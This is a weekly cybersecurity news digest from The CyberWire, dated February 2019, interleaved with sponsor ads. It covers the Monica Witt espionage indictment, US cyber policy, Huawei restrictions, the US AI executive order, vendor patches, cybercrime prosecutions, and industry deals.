Experiencing poor performance with your legacy antivirus? Try CB Defense.
Does your legacy antivirus slow down end user endpoints? Try Carbon Black's lightweight, next-generation antivirus + endpoint detection and response solution in your environment for free!
Compare CB Defense to your current solution using real-world scenarios, and see how operations transform across your security and IT teams. After you've finished your 15-day trial, you'll have everything you need to build a business case and make the switch. Gain superior protection, simplified operations, and actionable visibility today.
The Week that Was.
February 16, 2019.
By the CyberWire staff
An espionage indictment, with notes on social engineering.
The US Department of Justice on Wednesday unsealed an indictment against Monica Elfriede Witt, a former US Air Force technical sergeant who served as a counterintelligence specialist and Farsi linguist between 1997 and 2008, alleging that she gave highly classified information to Iran's government. She served four years in the Middle East collecting signals intelligence (NPR), then left the Air Force in 2008 and spent the next two years working for Federal contractors. Ms Witt held a top-secret security clearance while on active duty and during her subsequent two years as a contractor.
Ms Witt's turn in sympathies became publicly apparent around February 2012, when she traveled to Iran to attend a New Horizons Organization Conference on the depravity of American popular culture. ("Hollywoodism," as New Horizons called it.) Around the same time she appeared in videos "making statements that were critical of the US government, knowing these videos would be broadcast by Iranian media outlets" (BBC).
In May 2012 the FBI warned Ms Witt that Iranian intelligence services were targeting her for recruitment. She assured the FBI that she wouldn't share classified information with the Iranians. In February 2013, Witt returned to Iran to attend another conference, and again appeared in videos identifying herself as a US veteran and criticizing the US government.
In early 2013 Ms Witt exchanged messages with an Iranian individual, expressing her willingness to provide information. She was frustrated that the Iranians were suspicious of her sincerity, and said she was considering taking the information to Russia or Wikileaks instead, "do[ing] like Snowden" and making the information public (Washington Post). She defected to Iran in August 2013, and there compiled dossiers on her former colleagues in counterintelligence. Those "target packages" were used by the Iranians to conduct spearphishing and other social engineering attacks against US government agents. Some attacks enjoyed at least partial success, including attempts to connect people who should have known better with a catphish. Target packages are a serious business, used as they are to locate, track, compromise, and even capture or kill specific individuals.
The indictment also charges four Iranian men with actually conducting the attacks. When the indictment was unsealed, the US Treasury Department announced sanctions against New Horizon Organization and its organizers, as well as an Iranian IT company that supported the hacking operations (CyberScoop).
Ms Witt was awarded an Air Medal during her time on active duty. What did she do to earn it? Worked aboard an RC-135 Rivet Joint surveillance aircraft during the 2003 Gulf War (Air Force Times). Not everyone gets to serve as Rivet Joint aircrew.
Want An Insider View Into the Methods and Exploits of the World's Most Famous Hacker?
The world's most reputable organizations rely on Kevin Mitnick to uncover their most dangerous security flaws and Kevin’s knowledge of social engineering can help you stay a step ahead of the bad guys too. Wouldn’t it be great to learn about the latest threats and find out “What Would Kevin Do”? Now you can!
The US Administration has doubled down on its aggressive strategy in cyberspace, an approach that has won tentative praise from security experts. An example of this maybe seen in US Cyber Command's secretive (yet coyly alluded to in testimony before the Senate this week) operations to deter Russian disinformation campaigns (Manila Times). The New York Times reported in October that Cyber Command was contacting Russian individuals directly and letting them know that they were being watched. In an interview with Joint Force Quarterly, Cyber Command's commander and NSA director General Paul Nakasone outlined the concept of "persistent engagement" which includes "defending forward."
A majority of cybersecurity experts surveyed by the Washington Post believe this a generally sound strategy, although many advise some additional oversight by Government civilian agencies.
A piece in Fifth Domain argues for an even more assertive form of retaliation for cyberattacks: the US should respond proportionately with kinetic weapons that have two of the advantages cyber weapons enjoy—plausible deniability and significant but non-lethal damage. Deniability would presumably be important in avoiding escalation, but for now at least the US appears content with defending forward.
The State Department's Global Engagement Center (GEC), its counter-propaganda office, will receive a $55 million budget in 2019, and Congress may increase that to $115 million (Foreign Policy). Navy veteran and former journalist Lea Gabrielle took over the GEC on February 11th. She believes China, Russia, Iran, and terrorist organizations represent the top propaganda threats to the US (Foreign Policy).
Get comprehensive information about securing the DIB supply chain
According to a 2018 Ponemon report, 61% of surveyed organizations have experienced a data breach caused by a third-party vendor. Cyber criminals are targeting Defense Industrial Base (DIB) supply chain vendors in order to gain access to government networks. The latest case study from Attila Security will help identify solutions to keep your organization’s data secure while avoiding disruptions to the DIB supply chain. Download the Vulnerabilities Within The DIB Supply Chain Case Study today.
Sino-American cyber competition.
The US and a number of its allies remain suspicious of Chinese device manufacturers as potential security threats. The University of California, Berkeley, has banned new research projects with Huawei, as well as all future funding or gifts from the company or its subsidiaries and affiliates. The ban took effect on January 30th, two days after the US Department of Justice indicted the company for stealing trade secrets and violating international sanctions. Huawei has given the school $7.8 million in funding over the past two years (South China Morning Post).
President Trump is still expected to sign an Executive Order that would effectively ban Huawei and other Chinese manufacturers from participating in US mobile networks. The order has been anticipated for months, but US officials now say it could be issued within days (New York Times). POLITICO said the order was likely to be signed before the Mobile World Congress Barcelona, which begins on February 25th, but that hasn't happened. In Barcelona European telecommunications providers say they'd prefer an EU-wide security testing system that would address threats as they were found, and before they were introduced into 5G networks (Reuters). US rural carriers have also expressed reservations about a proposed ban because Huawei offers affordable and reliable equipment (Wall Street Journal).
Two US cabinet secretaries, Secretary of State Pompeo (BankInfoSecurity) and Defense Secretary Shanahan (Bloomberg) urged European allies to take the threat of Chinese espionage more seriously.
Expert-led sessions. Two Expo halls full of the latest cybersecurity solutions. Fascinating keynote speakers. You guessed it—it’s RSA Conference 2019, March 4 – 8 in San Francisco, the ultimate place to expand your knowledge, your perspective, your network and your career. From the latest trends to best practices, RSAC 2019 is your one-stop-shop for cybersecurity intel. Register today.
The US Executive Order on artificial intelligence.
President Trump on Monday signed an Executive Order meant to maintain American leadership in the realm of artificial intelligence in the face of relentless Chinese competition. The US AI Initiative will be coordinated through the National Science and Technology Council (NSTC) Select Committee on Artificial Intelligence, which will determine the government agencies primarily responsible for conducting foundational research, development, and deployment of AI technologies.
While the order directs agencies to prioritize AI funding when planning their existing budgets, any additional funding would have to come from congress. Some observers have criticized this aspect of the bill, pointing out that even individual cities in China are pouring billions of dollars into AI initiatives (Recode). Harvard Professor Jason Furman, who worked on the Obama administration's 2016 report on artificial intelligence, told Technology Review that the Trump administration's initiative "includes all of the right elements," and "the critical test will be to see if they follow through in a vigorous manner."
Not only is AI a family of technologies with significant application to cybersecurity, but it's also an occasion of conflict in cyberspace, especially since AI leadership is as much a Chinese national economic and security aspiration as it is an American goal.
Access Unlimited Virtual Practice Labs - Limited Time Offer
Develop your cybersecurity skills through hands-on learning with unlimited virtual labs from Rangeforce, Kaplan, Practice Labs, Cydefe, and more. Cybrary is the world’s fastest growing cybersecurity online learning platform, dedicated to offering the most current industry tools and curriculums taught by subject matter experts, and providing the best hand-ons labs and certification preparation anywhere. Join Cybrary Insider Pro for 30% OFF using discount code CYBERWIRE30.
Apple's 12.1.4 update fixes two zero-day vulnerabilities that were being exploited by hackers. One of the zero-days was a memory corruption flaw that allowed privilege escalation for applications. The other allowed applications to run arbitrary code with kernel-level privileges. The update also patches the FaceTime flaw that essentially allowed users' devices to be turned into hot mics (SecurityWeek).
Chrome OS 72 improves the security of Shill, Chromium's network connection manager, by placing it in a sandbox and removing its root privileges (SecurityWeek).
0patch released a temporary patch for an Adobe Reader DC zero-day that could allow attackers to steal hashed password values through SMB requests. The patch warns the user and asks for confirmation before sending an SMB request. Adobe told Threatpost that it plans to release an official fix this week.
On Patch Tuesday, Adobe released fixes for critical and important vulnerabilities in Adobe Flash Player, ColdFusion, and the Creative Cloud Desktop Application installer. The flaws could lead to privilege escalation, information disclosure, and arbitrary code execution (BleepingComputer).
Microsoft issued patches for 77 security vulnerabilities in Windows, around 20 of which were deemed critical (ZDNet). One of these vulnerabilities was a zero-day in Internet Explorer that was being actively exploited (KrebsOnSecurity).
Crime and punishment.
A leading (alleged) Apophis Squad skid, Mr. Timothy Dalton Vaughn (noms-de-hack "HDGZero," "WantedByFeds," and "Xavier Farbel") was indicted by the Feds after his identity was compromised via a hacked gaming site. One of his alleged confederates, Mr. George Duke-Cohan (whose noms-de hack are too colorless to warrant mention) was also indicted. Their alleged activities included swatting, DDoS, doxing, bomb threats, the whole sad customary run of skid lulz (KrebsOnSecurity).
Courts and torts.
The US Federal Trade Commission is negotiating a multi-billion-dollar settlement with Facebook over privacy issues (Washington Post).
Huawei is threatening to sue Czech cyber watchdog NÚKIB unless it retracts warnings issued in December 2018 calling Huawei and ZTE "security threats" (Epoch Times).
Apple is being sued by New Yorker Jay Brodsky for requiring its users to use two-factor authentication to access some features. Brodsky's lawsuit claims that logging in with 2FA takes up to five minutes, and that the time lost is causing him "economic losses." Also, while it's not clear how Apple is making money from such two-factor authentication, Brodsky wants the company to pay him back its "ill-gotten gains" (Naked Security).
A Scottish company, Peebles Media of Glasgow, is suing a former employee who fell for a BEC scam that cost the company £200,000 (BBC). The company says the employee was careless and should have known better, but Trend Micro believes it would be more constructive to focus on improving training and process controls than to sue employees.
Policies, procurements, and agency equities.
General Paul Nakasone, Director NSA and commander of US Cyber Command, told the Senate Thursday that the nature and operational tempo of the threat is such that Cyber Command will need to expand, moving beyond its present workforce and the one-hundred-thirty-three teams currently organized. Senators wanted some specific spy stories, particularly about Russia and China, but the General dodged artfully (FCW). He did say both China and Russia remained active threats, and that Russian influence operations were a matter of particular concern (Meritalk). He also claimed some success for the new US "defend forward" retaliatory strategy, which he said has worked where deterrence has not (Fifth Domain).
The Pentagon is spending tens of millions of dollars on new cyber training centers for the US military. The Air Force will issue a Request for Proposals for a $30 million expansion of its CyberWorx project later this month. The US Army's Cyber Center of Excellence issued a Request for Information regarding cybersecurity training and exercises. The Army also released a solicitation outlining its plans to build four new cyber ranges—two in Florida, one in South Carolina, and one in Maryland (Fifth Domain).
Christopher Krebs, head of the Cybersecurity and Infrastructure Security Agency (CISA), told Congress on Wednesday that the ability to audit infrastructure is the key to ensuring election integrity (FCW).
Fortunes of commerce.
US Representative Adam Schiff (Democrat of California) sent Facebook CEO Mark Zuckerberg a letter requesting that the social network remove anti-vaccination content from its platform. Representative Schiff cast the matter as a public health issue: he’s concerned about the implications of falling vaccination rates. But there's growing interest by many governments in content moderation generally.
Mergers and acquisitions.
Most small and mid-size businesses still haven't migrated to the cloud, so the cybersecurity market is expected to continue growing. David Wagner, CEO of data protection services provider Zix, says that the trend toward cloud migration spurred his company's purchase of AppRiver, a provider of e-mail and web protection services. Wagner points out that "we’re still in the early innings of cloud migration," so "cybersecurity will remain a robust environment for M&A" (Mergers & Acquisitions).
It's also worth noting, as SC Magazine does, that mergers and acquisitions represent security as well as business and financial inflection points. Marriott's major data breach, for example, had its roots in the hotel chain's Starwood acquisition.
Identity data intelligence shop GBG (headquartered in Chester, England) has conditionally agreed to acquire Atlanta, Georgia-based IDology. IDology's fraud prevention and identity verification services are expected to complement GBG's offerings, especially in North American markets. It's an all-cash deal with a $300-million price tag (Bankless Times).
As part of a push into North American markets, Stockholm-based Baffin Bay Networks (a cloud-native threat prevention company with significant customers in the financial services sector) has acquired Loryka. Headquartered in Vancouver, Washington, Loryka is a research shop specializing in botnets and the IoT (CISO Magazine).
Symantec has bought Israeli start-up Luminate Security, whose Secure Access Cloud offering will be merged into Symantec’s Integrated Cyber Defense Platform (CRN).
Qualys has acquired the software assets of Adya, a San Francisco-based cloud security startup that specializes in securing SaaS applications (CRN).
Investments and exits.
Francisco Partners, which for several years has been looking for a buyer willing to take controversial lawful Intercept (or spyware) company NSO Group off its hands, has succeeded. The company's founders are buying it back, with the assistance of Novalpina and the Jefferies Group (Fast Company). Terms weren't disclosed, but Ha'aretz says the 60% of the company Shalev Hulio and Omri Lavi purchased with their partners puts a value of about $1 billion on the firm.
C2A Security, a Jerusalem-based start-up that offers on-board cybersecurity systems to protect connected vehicles, has raised $6.5 million in a Series A round. Maniv Mobility and ICV led the investment, with participation from Labs/02 (AP).
RSAC 2019 Innovation Sandbox finalist Axionis has closed a $13-million Series A round. The company intends to use the funds to further develop the Axonius Cybersecurity Asset Management Platform, which automates various security management and policy activities. Bessemer Venture Partners led the round. Existing investors YL Ventures, Vertex, WTI, and Emerge also participated.
Elevate Security announced an $8-million Series A round, led by Defy Partners with participation by existing investor Costanoa Ventures. San Francisco-based Elevate says its Security Behavior solution "motivates, measures and rewards employees to change their security habits, while at the same time giving security teams unprecedented visibility into the security habits and actions of their employees" (TechCrunch).
Today's issue includes events affecting China, Czech Republic, European Union, Hungary, Iran, Israel, Poland, Russia, Slovakia, Spain, United Kingdom, United States.
A quick reminder: this Monday, February 18th, is Presidents' Day, and as is our custom on US Federal holidays, we won't publish either the Daily News Briefing or the Daily Podcast. Both will be back, as usual, on Tuesday. Enjoy the holiday if you're here in the US.
ON THE PODCAST
Research Saturday is up. In this episode, "Seedworm digs Middle East intelligence," we talk with Symantec's Al Cooley, who reviews their research into the Seedworm cyber espionage group. Seedworm has beentargeting the Middle East as well as Europe and North America. The threat group goes after government agencies, oil and gas facilities, NGOs, telecoms and IT firms. Al Cooley is director of product management at Symantec, and he joins us to share their findings.
SPONSOR & SUPPORT
Grow your brand and reach new customers.
Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.
Be a part of the CyberWire story.
People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.